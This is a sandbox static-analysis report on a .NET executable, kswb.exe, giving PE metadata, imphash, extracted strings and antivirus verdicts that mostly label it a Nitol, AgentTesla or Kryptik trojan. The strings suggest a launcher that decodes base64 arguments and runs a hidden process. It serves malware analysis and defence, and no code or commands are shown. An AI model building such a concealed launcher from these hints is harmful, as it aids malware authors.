Static | ZeroBOX

PE Compile Time

2021-09-02 18:44:07

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x000006c4    0x00000800        4.20514974025
.rsrc   0x00004000       0x000004d0    0x00000600        3.68963852556
.reloc  0x00006000       0x0000000c    0x00000200        0.0815394123432

Resources

Name         Offset      Size        Language      Sub-language     File type
RT_VERSION   0x000040a0  0x0000023c  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_MANIFEST  0x000042e0  0x000001ea  LANG_NEUTRAL  SUBLANG_NEUTRAL  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
kswb.exe
Program
mscorlib
System
Object
System.Runtime.InteropServices
GuidAttribute
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
System.Diagnostics
ProcessStartInfo
set_FileName
System.Text
Encoding
get_ASCII
Convert
FromBase64String
GetString
set_Arguments
ProcessWindowStyle
set_WindowStyle
Process
$8e17417f-8891-49fe-b053-4267b9a2ba98
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
kswb.exe
LegalCopyright
OriginalFilename
kswb.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0

Antivirus Signature
Bkav Clean
Lionic Trojan.MSIL.Nitol.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Clean
FireEye Generic.mg.9ac22682b4c95a59
CAT-QuickHeal Clean
McAfee AgentTesla-FDCM!9AC22682B4C9
Cylance Unsafe
VIPRE Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Clean
BitDefender Clean
K7GW Clean
CrowdStrike win/malicious_confidence_80% (W)
Baidu Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/Kryptik.ACOO
APEX Malicious
Paloalto generic.ml
ClamAV Clean
Kaspersky HEUR:Trojan.MSIL.Nitol.gen
Alibaba Trojan:MSIL/Nitol.0fbcf4c4
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
TACHYON Clean
Emsisoft Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Generic.xz
CMC Clean
Sophos Mal/Generic-S
Ikarus Win32.Outbreak
GData Clean
Jiangmin Clean
Webroot W32.Trojan.Gen
Avira Clean
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSIL.Nitol.gen
Microsoft Trojan:Win32/Wacatac.B!ml
Cynet Clean
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Gen:NN.ZemsilF.34126.am0@aSX1Mdd
ALYac Clean
MAX Clean
VBA32 Clean
Malwarebytes Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Msil.Trojan.Nitol.Hwwg
Yandex Clean
SentinelOne Static AI - Malicious PE
eGambit Unsafe.AI_Score_97%
Fortinet MSIL/Kryptik.ACOO!tr
Cybereason malicious.0ed200
Avast Clean
MaxSecure Trojan.Malware.300983.susgen

No IRMA results available.